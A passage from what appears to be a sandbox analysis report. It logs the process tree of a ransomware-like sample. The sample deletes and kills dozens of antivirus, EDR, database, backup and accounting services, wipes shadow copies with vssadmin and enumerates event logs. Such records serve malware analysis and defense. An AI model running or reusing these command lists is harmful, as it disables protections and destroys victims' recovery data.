4⤵
PID:5764

C:\Windows\SysWOW64\sc.exe
sc delete "Core Browsing Protection"
4⤵
PID:6712

C:\Windows\SysWOW64\sc.exe
sc delete "Quick Update Service"
4⤵
PID:5328

C:\Windows\SysWOW64\sc.exe
sc delete "McAfeeFramework"
4⤵
PID:2344

C:\Windows\SysWOW64\sc.exe
sc delete "macmnsvc"
4⤵
- Launches sc.exe
PID:5264

C:\Windows\SysWOW64\sc.exe
sc delete "masvc"
4⤵
PID:6388

C:\Windows\SysWOW64\sc.exe
sc delete "mfemms"
4⤵
- Launches sc.exe
PID:6080

C:\Windows\SysWOW64\sc.exe
sc delete "mfevtp"
4⤵
- Launches sc.exe
PID:268

C:\Windows\SysWOW64\sc.exe
sc delete "TmFilter"
4⤵
PID:1408

C:\Windows\SysWOW64\sc.exe
sc delete "TMLWCSService"
4⤵
PID:5368

C:\Windows\SysWOW64\sc.exe
sc delete "tmusa"
4⤵
- Launches sc.exe
PID:5576

C:\Windows\SysWOW64\sc.exe
sc delete "TmPreFilter"
4⤵
PID:5696

C:\Windows\SysWOW64\sc.exe
sc delete "TMSmartRelayService"
4⤵
PID:96

C:\Windows\SysWOW64\sc.exe
sc delete "TMiCRCScanService"
4⤵
PID:4972

C:\Windows\SysWOW64\sc.exe
sc delete "VSApiNt"
4⤵
PID:6708

C:\Windows\SysWOW64\sc.exe
sc delete "TmCCSF"
4⤵
- Launches sc.exe
PID:3524

C:\Windows\SysWOW64\sc.exe
sc delete "tmlisten"
4⤵
- Launches sc.exe
PID:3688

C:\Windows\SysWOW64\sc.exe
sc delete "TmProxy"
4⤵
PID:5356

C:\Windows\SysWOW64\sc.exe
sc delete "ntrtscan"
4⤵
PID:3240

C:\Windows\SysWOW64\sc.exe
sc delete "ofcservice"
4⤵
PID:5248

C:\Windows\SysWOW64\sc.exe
sc delete "TmPfw"
4⤵
PID:4412

C:\Windows\SysWOW64\sc.exe
sc delete "PccNTUpd"
4⤵
PID:4688

C:\Windows\SysWOW64\sc.exe
sc delete "PandaAetherAgent"
4⤵
- Launches sc.exe
PID:6384

C:\Windows\SysWOW64\sc.exe
sc delete "PSUAService"
4⤵
PID:6212

C:\Windows\SysWOW64\sc.exe
sc delete "NanoServiceMain"
4⤵
PID:5284

C:\Windows\SysWOW64\sc.exe
sc delete "EPIntegrationService"
4⤵
PID:5440

C:\Windows\SysWOW64\sc.exe
sc delete "EPProtectedService"
4⤵
- Launches sc.exe
PID:5292

C:\Windows\SysWOW64\sc.exe
sc delete "EPRedline"
4⤵
- Launches sc.exe
PID:5436

C:\Windows\SysWOW64\sc.exe
sc delete "EPSecurityService"
4⤵
PID:256

C:\Windows\SysWOW64\sc.exe
sc delete "EPUpdateService"
4⤵
PID:5360

C:\Windows\SysWOW64\sc.exe
sc delete "UniFi"
4⤵
PID:3452

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im PccNTMon.exe
4⤵
PID:4800

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im NTRtScan.exe
4⤵
PID:1580

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmListen.exe
4⤵
PID:1060

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmCCSF.exe
4⤵
- Kills process with taskkill
PID:5424

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmProxy.exe
4⤵
PID:4804

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
4⤵
PID:5452

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
4⤵
PID:3404

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmPfw.exe
4⤵
PID:6320

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im CNTAoSMgr.exe
4⤵
PID:4144

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlbrowser.exe
4⤵
PID:5240

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlwriter.exe
4⤵
PID:1128

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
4⤵
PID:6036

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msmdsrv.exe
4⤵
PID:4976

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
4⤵
PID:5736

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlceip.exe
4⤵
PID:6412

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
4⤵
PID:5592

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im Ssms.exe
4⤵
PID:5072

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im SQLAGENT.EXE
4⤵
PID:5808

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdhost.exe
4⤵
PID:4520

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
4⤵
PID:6316

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
4⤵
PID:1008

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im ReportingServicesService.exe
4⤵
PID:5528

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msftesql.exe
4⤵
- Kills process with taskkill
PID:6380

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im pg_ctl.exe
4⤵
PID:6636

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im postgres.exe
4⤵
PID:6032

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
4⤵
PID:6528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
5⤵
PID:6460

C:\Windows\SysWOW64\net.exe
net stop MSSQL$ISARS
4⤵
PID:6108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
5⤵
PID:4304

C:\Windows\SysWOW64\net.exe
net stop MSSQL$MSFW
4⤵
PID:6668

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ISARS
4⤵
PID:5888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
5⤵
PID:4460

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$MSFW
4⤵
PID:6740

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
4⤵
PID:2320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
5⤵
PID:7156

C:\Windows\SysWOW64\net.exe
net stop ReportServer$ISARS
4⤵
PID:6820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$ISARS
5⤵
PID:7072

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
4⤵
PID:6100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
5⤵
PID:6700

C:\Windows\SysWOW64\net.exe
net stop WinDefend
4⤵
PID:5480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinDefend
5⤵
PID:6176

C:\Windows\SysWOW64\net.exe
net stop mr2kserv
4⤵
PID:6200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mr2kserv
5⤵
PID:6392

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
4⤵
PID:6008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
5⤵
PID:7056

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFBA
4⤵
PID:7160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFBA
5⤵
PID:628

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
4⤵
PID:1020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
5⤵
PID:5912

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA
4⤵
PID:5152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA
5⤵
PID:6804

C:\Windows\SysWOW64\net.exe
net stop ShadowProtectSvc
4⤵
PID:6908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShadowProtectSvc
5⤵
PID:5188

C:\Windows\SysWOW64\net.exe
net stop SPAdminV4
4⤵
PID:6800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPAdminV4
5⤵
PID:6932

C:\Windows\SysWOW64\net.exe
net stop SPTimerV4
4⤵
PID:6040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTimerV4
5⤵
PID:4368

C:\Windows\SysWOW64\net.exe
net stop SPTraceV4
4⤵
PID:5352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTraceV4
5⤵
PID:6540

C:\Windows\SysWOW64\net.exe
net stop SPUserCodeV4
4⤵
PID:5036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPUserCodeV4
5⤵
PID:4372

C:\Windows\SysWOW64\net.exe
net stop SPWriterV4
4⤵
PID:5900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPWriterV4
5⤵
PID:6780

C:\Windows\SysWOW64\net.exe
net stop SPSearch4
4⤵
PID:6940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPSearch4
5⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
4⤵
PID:7100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
5⤵
PID:6896

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
4⤵
PID:5252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
5⤵
PID:6128

C:\Windows\SysWOW64\net.exe
net stop firebirdguardiandefaultinstance
4⤵
PID:5288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
5⤵
PID:6944

C:\Windows\SysWOW64\net.exe
net stop ibmiasrw
4⤵
PID:3268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ibmiasrw
5⤵
PID:7140

C:\Windows\SysWOW64\net.exe
net stop QBCFMonitorService
4⤵
PID:6916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService
5⤵
PID:7028

C:\Windows\SysWOW64\net.exe
net stop QBVSS
4⤵
PID:6900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
5⤵
PID:4852

C:\Windows\SysWOW64\net.exe
net stop QBPOSDBServiceV12
4⤵
PID:3516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBPOSDBServiceV12
5⤵
PID:6844

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
4⤵
PID:6912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
5⤵
PID:5788

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
4⤵
PID:5852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
5⤵
PID:696

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
4⤵
PID:5268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
5⤵
PID:5448

C:\Windows\SysWOW64\net.exe
net stop "Simply Accounting Database Connection Manager"
4⤵
PID:6068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
5⤵
PID:5992

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB1
4⤵
PID:6876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB1
5⤵
PID:7096

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB2
4⤵
PID:5364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB2
5⤵
PID:3380

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB3
4⤵
PID:1796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB3
5⤵
PID:5456

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB4
4⤵
PID:2168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB4
5⤵
PID:1972

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB5
4⤵
PID:5272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB5
5⤵
PID:4988

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im UniFi.exe
4⤵
PID:1736

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq MsMpEng.exe"
4⤵
- Enumerates processes with tasklist
PID:2612

C:\Windows\SysWOW64\find.exe
find /c "PID"
4⤵
PID:6052

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq ntrtscan.exe"
4⤵
- Enumerates processes with tasklist
PID:972

C:\Windows\SysWOW64\find.exe
find /c "PID"
4⤵
PID:504

C:\Windows\SysWOW64\find.exe
find /c "PID"
4⤵
PID:1136

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq avp.exe"
4⤵
- Enumerates processes with tasklist
PID:4408

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq WRSA.exe"
4⤵
- Enumerates processes with tasklist
PID:5200

C:\Windows\SysWOW64\find.exe
find /c "PID"
4⤵
PID:4344

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq egui.exe"
4⤵
- Enumerates processes with tasklist
PID:1468

C:\Windows\SysWOW64\find.exe
find /c "PID"
4⤵
PID:2084

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq AvastUI.exe"
4⤵
- Enumerates processes with tasklist
PID:6132

C:\Windows\SysWOW64\find.exe
find /c "PID"
4⤵
PID:5128

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:1056

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
4⤵
PID:2904

C:\Windows\SysWOW64\sc.exe
sc delete "DAService_TCP"
5⤵
PID:5248

C:\Windows\SysWOW64\sc.exe
sc delete "eCard-TTransServer"
5⤵
PID:6756

C:\Windows\SysWOW64\sc.exe
sc delete eCardMPService
5⤵
- Launches sc.exe
PID:5844

C:\Windows\SysWOW64\sc.exe
sc delete EnergyDataService
5⤵
PID:1128

C:\Windows\SysWOW64\sc.exe
sc delete UI0Detect
5⤵
- Launches sc.exe
PID:5980

C:\Windows\SysWOW64\sc.exe
sc delete K3MobileService
5⤵
PID:6616

C:\Windows\SysWOW64\sc.exe
sc delete TCPIDDAService
5⤵
PID:2320

C:\Windows\SysWOW64\sc.exe
sc delete WebAttendServer
5⤵
PID:628

C:\Windows\SysWOW64\sc.exe
sc delete UIODetect
5⤵
PID:6064

C:\Windows\SysWOW64\sc.exe
sc delete "wanxiao-monitor"
5⤵
PID:4016

C:\Windows\SysWOW64\sc.exe
sc delete VMAuthdService
5⤵
PID:7140

C:\Windows\SysWOW64\sc.exe
sc delete VMUSBArbService
5⤵
PID:5792

C:\Windows\SysWOW64\sc.exe
sc delete VMwareHostd
5⤵
- Launches sc.exe
PID:5456

C:\Windows\SysWOW64\sc.exe
sc delete "vm-agent"
5⤵
PID:3932

C:\Windows\SysWOW64\sc.exe
sc delete VmAgentDaemon
5⤵
PID:3556

C:\Windows\SysWOW64\sc.exe
sc delete OpenSSHd
5⤵
PID:5796

C:\Windows\SysWOW64\sc.exe
sc delete eSightService
5⤵
- Launches sc.exe
PID:1060

C:\Windows\SysWOW64\sc.exe
sc delete apachezt
5⤵
PID:488

C:\Windows\SysWOW64\sc.exe
sc delete Jenkins
5⤵
- Launches sc.exe
PID:5416

C:\Windows\SysWOW64\sc.exe
sc delete secbizsrv
5⤵
- Launches sc.exe
PID:6228

C:\Windows\SysWOW64\sc.exe
sc delete SQLTELEMETRY
5⤵
PID:5660

C:\Windows\SysWOW64\sc.exe
sc delete MSMQ
5⤵
- Launches sc.exe
PID:6644

C:\Windows\SysWOW64\sc.exe
sc delete smtpsvrJT
5⤵
PID:5772

C:\Windows\SysWOW64\sc.exe
sc delete zyb_sync
5⤵
PID:6740

C:\Windows\SysWOW64\sc.exe
sc delete 360EntHttpServer
5⤵
PID:4360

C:\Windows\SysWOW64\sc.exe
sc delete 360EntSvc
5⤵
PID:6596

C:\Windows\SysWOW64\sc.exe
sc delete 360EntClientSvc
5⤵
PID:6764

C:\Windows\SysWOW64\sc.exe
sc delete wampapache
5⤵
- Launches sc.exe
PID:3580

C:\Windows\SysWOW64\sc.exe
sc delete MSSEARCH
5⤵
PID:5400

C:\Windows\SysWOW64\sc.exe
sc delete NFWebServer
5⤵
- Launches sc.exe
PID:5992

C:\Windows\SysWOW64\sc.exe
sc delete msftesql
5⤵
PID:3664

C:\Windows\SysWOW64\sc.exe
sc delete "SyncBASE Service"
5⤵
- Launches sc.exe
PID:4400

C:\Windows\SysWOW64\sc.exe
sc delete OracleDBConcoleorcl
5⤵
PID:5704

C:\Windows\SysWOW64\sc.exe
sc delete OracleJobSchedulerORCL
5⤵
- Launches sc.exe
PID:1580

C:\Windows\SysWOW64\sc.exe
sc delete OracleMTSRecoveryService
5⤵
- Launches sc.exe
PID:5544

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
4⤵
PID:3532

C:\Windows\SysWOW64\sc.exe
sc delete "XT800Service_Personal"
5⤵
PID:4604

C:\Windows\SysWOW64\sc.exe
sc delete SQLSERVERAGENT
5⤵
- Launches sc.exe
PID:2068

C:\Windows\SysWOW64\sc.exe
sc delete SQLWriter
5⤵
PID:6336

C:\Windows\SysWOW64\sc.exe
sc delete SQLBrowser
5⤵
PID:6424

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLSERVER
5⤵
PID:5888

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLFDLauncher
5⤵
PID:6620

C:\Windows\SysWOW64\sc.exe
sc delete QcSoftService
5⤵
PID:6408

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLServerOLAPService
5⤵
PID:6936

C:\Windows\SysWOW64\sc.exe
sc delete VMTools
5⤵
PID:5900

C:\Windows\SysWOW64\sc.exe
sc delete VGAuthService
5⤵
PID:3268

C:\Windows\SysWOW64\sc.exe
sc delete MSDTC
5⤵
- Launches sc.exe
PID:6952

C:\Windows\SysWOW64\sc.exe
sc delete TeamViewer
5⤵
- Launches sc.exe
PID:5508

C:\Windows\SysWOW64\sc.exe
sc delete ReportServer
5⤵
PID:4156

C:\Windows\SysWOW64\sc.exe
sc delete RabbitMQ
5⤵
- Launches sc.exe
PID:4992

C:\Windows\SysWOW64\sc.exe
sc delete "AHS SERVICE"
5⤵
PID:1236

C:\Windows\SysWOW64\sc.exe
sc delete "Sense Shield Service"
5⤵
PID:256

C:\Windows\SysWOW64\sc.exe
sc delete SSMonitorService
5⤵
PID:5016

C:\Windows\SysWOW64\sc.exe
sc delete SSSyncService
5⤵
PID:5840

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdAppService1300
5⤵
PID:6488

C:\Windows\SysWOW64\sc.exe
sc delete MSSQL$SQL2008
5⤵
PID:5632

C:\Windows\SysWOW64\sc.exe
sc delete SQLAgent$SQL2008
5⤵
- Launches sc.exe
PID:6616

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdTaskService1300
5⤵
PID:6528

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdUpgradeService1300
5⤵
PID:5480

C:\Windows\SysWOW64\sc.exe
sc delete VirboxWebServer
5⤵
- Launches sc.exe
PID:4748

C:\Windows\SysWOW64\sc.exe
sc delete jhi_service
5⤵
PID:2644

C:\Windows\SysWOW64\sc.exe
sc delete LMS
5⤵
PID:6732

C:\Windows\SysWOW64\sc.exe
sc delete "FontCache3.0.0.0"
5⤵
PID:5680

C:\Windows\SysWOW64\sc.exe
sc delete "OSP Service"
5⤵
PID:4272

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
4⤵
PID:4912

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6056

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1ClrAgent
5⤵
PID:3800

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1TNSListener
5⤵
PID:5300

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
5⤵
PID:5332

C:\Windows\SysWOW64\sc.exe
sc delete OracleServiceORCL
5⤵
PID:5736

C:\Windows\SysWOW64\sc.exe
sc delete aspnet_state @sc delete Redis
5⤵
PID:6000

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
5⤵
PID:6512

C:\Windows\SysWOW64\sc.exe
sc delete JhTask
5⤵
- Launches sc.exe
PID:7076

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
5⤵
PID:3396

C:\Windows\SysWOW64\sc.exe
sc delete XT800Service_Personal
5⤵
- Launches sc.exe
PID:6040

C:\Windows\SysWOW64\sc.exe
sc delete MCService
5⤵
PID:276

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
5⤵
PID:3020

C:\Windows\SysWOW64\sc.exe
sc delete allpass_redisservice_port21160
5⤵
PID:4108

C:\Windows\SysWOW64\sc.exe
sc delete "Flash Helper Service"
5⤵
PID:4416

C:\Windows\SysWOW64\sc.exe
sc delete "Kiwi Syslog Server"
5⤵
PID:2524

C:\Windows\SysWOW64\sc.exe
sc delete "UWS HiPriv Services"
5⤵
PID:4468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WEVTUTIL EL
4⤵
PID:5156

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL EL
5⤵
PID:6156

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM 